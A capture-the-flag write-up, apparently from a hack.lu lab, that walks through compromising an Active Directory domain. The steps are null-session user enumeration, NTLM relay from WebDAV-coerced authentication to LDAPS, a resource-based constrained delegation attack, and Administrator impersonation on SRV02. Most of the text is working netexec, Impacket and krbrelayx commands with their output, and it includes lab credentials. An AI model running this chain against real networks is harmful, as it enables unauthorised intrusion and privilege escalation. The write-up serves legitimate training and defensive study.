Let’s start by listing users using null authentication, surprisingly, it worked on the DC and gave us a list of users. One of them had their password in the description field
1 2 3 4 5 6 7 8 9 10 11 12 13 14
➜ nxc smb targets.txt -u '' -p '' --users SMB 10.244.0.11 445 SRV02 [*] Windows Server 2022 Build 20348 x64 (name:SRV02) (domain:hack.lu) (signing:True) (SMBv1:None) SMB 10.244.0.10 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hack.lu) (signing:True) (SMBv1:None) (Null Auth:True) SMB 10.244.0.11 445 SRV02 [-] hack.lu\: STATUS_ACCESS_DENIED SMB 10.244.0.10 445 DC01 [+] hack.lu\: SMB 10.244.0.10 445 DC01 -Username- -Last PW Set- -BadPW- -Description- SMB 10.244.0.10 445 DC01 Gäst <never> 0 Fördefinierat gästkonto för datorn/domänen SMB 10.244.0.10 445 DC01 ta_bort.mig 2025-10-16 17:40:04 0 Praktikant: Lär sig Active Directory och hämtar kaffe med samma entusiasm. LjtLNg37LdcZin73 SMB 10.244.0.10 445 DC01 maja.lindgren 2025-10-16 17:40:04 0 Helpdesk-hjälte: Frågar alltid 'har du provat att starta om?' innan hon räddar dagen. SMB 10.244.0.10 445 DC01 Freja.Lund 2025-10-16 17:40:04 0 Dekorationsguru: Gör hyllor glada. Vattnar växter mer punktligt än cronjobs. SMB 10.244.0.10 445 DC01 Sven.Andersson 2025-10-16 17:40:04 0 Skruvkung: Monterar problem snabbare än manualen hinner öppnas. SMB 10.244.0.10 445 DC01 Bjorn.Ek 2025-10-16 17:40:04 0 Instruktionsartist: Ritar manualer som ingen läser men alla behöver. SMB 10.244.0.10 445 DC01 [*] Enumerated 6 localusers: HACK Running nxc against 2 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
➜ bloodhound-python -c all -u 'ta_bort.mig' -p 'LjtLNg37LdcZin73' -d hack.lu -dc dc01.hack.lu -ns 10.244.0.10 --disable-pooling -w1 --dns-timeout 30 --zip INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3) INFO: Found AD domain: hack.lu INFO: Getting TGT for user INFO: Connecting to LDAP server: dc01.hack.lu INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 2 computers INFO: Connecting to LDAP server: dc01.hack.lu INFO: Found 9 users INFO: Found 52 groups INFO: Found 2 gpos INFO: Found 1 ous INFO: Found 19 containers INFO: Found 0 trusts INFO: Starting computer enumeration with 1 workers INFO: Querying computer: SRV02.hack.lu INFO: Querying computer: DC01.hack.lu INFO: Done in 00M 27S INFO: Compressing output into 20251020152455_bloodhound.zip
However, our current user can’t do much
LDAP Signing & Channel Binding
We notice something very important here: there’s no LDAP signing or channel binding on the DC, this means NTLM authentication can be relayed. To learn more about this topic I suggest you read this blogpost from TrustedSec. More resources are listed in the resources section at the end of this writeup
1 2
➜ nxc ldap dc01.hack.lu LDAP 10.244.0.10 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:hack.lu) (signing:None) (channel binding:Never)
Plan
The first thing we’ll do is coerce the authentication from SRV02, which is running the WebClient service. This will use the SRV02$ machine account to authenticate to our machine. Since WebDAV uses HTTP, the machine will authenticate using NTLM and because it’s a web request, we’ll be able to relay the authentication to LDAP, as signing isn’t enforced.
The relay will let us write the msDS-AllowedToActOnBehalfOfOtherIdentity attribute on the target object then impersonate any user on the machine
NTLM Relay to LDAPS
We can use the webdav module from netexec to check if the WebClient Service is enabled on SRV02, which is the case here
1 2 3 4
➜ nxc smb srv02.hack.lu -u 'ta_bort.mig' -p 'LjtLNg37LdcZin73' -M webdav SMB 10.244.0.11 445 SRV02 [*] Windows Server 2022 Build 20348 x64 (name:SRV02) (domain:hack.lu) (signing:True) (SMBv1:None) SMB 10.244.0.11 445 SRV02 [+] hack.lu\ta_bort.mig:LjtLNg37LdcZin73 WEBDAV 10.244.0.11 445 SRV02 WebClient Service enabled on: 10.244.0.11
We also check the Machine Account Quota value using the maq module
As you can see, the MachineAccountQuota value is 10, which is the default. This will let us create a machine account later for our RBCD attack, since each machine account comes with an SPN.
The only thing left now is to add a new DNS record that points to our attacker machine, because the WebClient connection string needs to be a hostname, not an IP address. This is something that’s allowed by default for all domain users.
Let’s use the dnstool.py tool from the krbrelayx repo
1 2 3 4 5 6
➜ dnstool.py -u 'hack.lu\ta_bort.mig' -p 'LjtLNg37LdcZin73' 10.244.0.10 -a add -d 10.244.2.2 -r 'pwned.hack.lu' [-] Connecting to host... [-] Binding to host [+] Bind OK [-] Adding new record [+] LDAP operation completed successfully
Let’s verify that the DNS record has been created and is pointing to our attacker’s IP address
Alternatively, we can use dnstool’s query parameter
1 2 3 4 5 6 7 8 9
➜ dnstool.py -u 'hack.lu\ta_bort.mig' -p 'LjtLNg37LdcZin73' 10.244.0.10 -a query -d 10.244.2.2 -r 'pwned.hack.lu' [-] Connecting to host... [-] Binding to host [+] Bind OK [+] Found record pwned DC=pwned,DC=hack.lu,CN=MicrosoftDNS,DC=DomainDnsZones,DC=hack,DC=lu [+] Record entry: - Type: 1 (A) (Serial: 36) - Address: 10.244.2.2
Next, we setup our listener for relaying the authentication to LDAP on the DC with the --delegate-access flag to write the msDS-AllowedToActOnBehalfOfOtherIdentity attribute on SRV02
➜ ntlmrelayx.py -t ldaps://dc01.hack.lu -smb2support --delegate-access Impacket v0.13.0.dev0+20251002.113829.eaf2e556 - Copyright Fortra, LLC and its affiliated companies
[*] Protocol Client IMAPS loaded.. [*] Protocol Client IMAP loaded.. [*] Protocol Client LDAPS loaded.. [*] Protocol Client LDAP loaded.. [*] Protocol Client SMTP loaded.. [*] Protocol Client RPC loaded.. [*] Protocol Client HTTP loaded.. [*] Protocol Client HTTPS loaded.. [*] Protocol Client WINRMS loaded.. [*] Protocol Client DCSYNC loaded.. [*] Protocol Client SMB loaded.. [*] Protocol Client MSSQL loaded.. [*] Running in relay mode to single host [*] Setting up SMB Server on port 445 [*] Setting up HTTP Server on port 80 [*] Setting up WCF Server on port 9389 [*] Setting up RAW Server on port 6666 [*] Setting up WinRM (HTTP) Server on port 5985 [*] Setting up WinRMS (HTTPS) Server on port 5986 [*] Setting up RPC Server on port 135 [*] Multirelay disabled
[*] Servers started, waiting for connections
Finally, we can use dementor (or any similar like PetitPotam,…) to coerce Webclient HTTP authentication
[*] (HTTP): Client requested path: /x/pipe/spoolss [*] (HTTP): Client requested path: /x/pipe/spoolss [*] (HTTP): Connection from 10.244.0.11 controlled, attacking target ldaps://dc01.hack.lu [*] (HTTP): Client requested path: /x/pipe/spoolss [*] (HTTP): Authenticating connection from HACK/SRV02$@10.244.0.11 against ldaps://dc01.hack.lu SUCCEED [1] [*] ldaps://HACK/SRV02$@dc01.hack.lu [1] -> Enumerating relayed user's privileges. This may take a while on large domains [*] (HTTP): Client requested path: /x/pipe/spoolss [*] (HTTP): Client requested path: /x/pipe/spoolss [*] All targets processed! [*] (HTTP): Connection from 10.244.0.11 controlled, but there are no more targets left! [*] (HTTP): Client requested path: /x/pipe/spoolss [*] (HTTP): Client requested path: /x/pipe/spoolss [*] All targets processed! [*] (HTTP): Connection from 10.244.0.11 controlled, but there are no more targets left! [*] (HTTP): Client requested path: /x/pipe [*] (HTTP): Client requested path: /x/pipe [*] All targets processed! [*] (HTTP): Connection from 10.244.0.11 controlled, but there are no more targets left! [*] ldaps://HACK/SRV02$@dc01.hack.lu [1] -> Attempting to create computer in: CN=Computers,DC=hack,DC=lu [*] ldaps://HACK/SRV02$@dc01.hack.lu [1] -> Adding new computer with username: SKQUJUFW$ and password: /7@R:6{i6r7+9Na result: OK [*] ldaps://HACK/SRV02$@dc01.hack.lu [1] -> Delegation rights modified succesfully! [*] ldaps://HACK/SRV02$@dc01.hack.lu [1] -> SKQUJUFW$ can now impersonate users on SRV02$ via S4U2Proxy
We can now request a service ticket as Administrator on SRV02
1 2 3 4 5 6 7 8 9 10 11 12 13
➜ getST.py -impersonate Administrator -spn cifs/srv02.hack.lu -dc-ip 10.244.0.10 hack.lu/'SKQUJUFW$':'/7@R:6{i6r7+9Na' Impacket v0.13.0.dev0+20251002.113829.eaf2e556 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping... [*] Getting TGT for user [*] Impersonating Administrator [*] Requesting S4U2self [*] Requesting S4U2Proxy [*] Saving ticket in Administrator@cifs_srv02.hack.lu@HACK.LU.ccache ➜ export KRB5CCNAME=Administrator@cifs_srv02.hack.lu@HACK.LU.ccache ➜ nxc smb srv02.hack.lu --use-kcache SMB srv02.hack.lu 445 SRV02 [*] Windows Server 2022 Build 20348 x64 (name:SRV02) (domain:hack.lu) (signing:True) (SMBv1:None) SMB srv02.hack.lu 445 SRV02 [+] hack.lu\Administrator from ccache (Pwn3d!)
Or we can automate all of that using the --delegate option from netexec
1 2 3
➜ nxc smb srv02.hack.lu -u 'SKQUJUFW$' -p '/7@R:6{i6r7+9Na' --delegate administrator SMB srv02.hack.lu 445 SRV02 [*] Windows Server 2022 Build 20348 x64 (name:SRV02) (domain:hack.lu) (signing:True) (SMBv1:None) SMB srv02.hack.lu 445 SRV02 [+] hack.lu\administrator through S4U with SKQUJUFW$ (Pwn3d!)
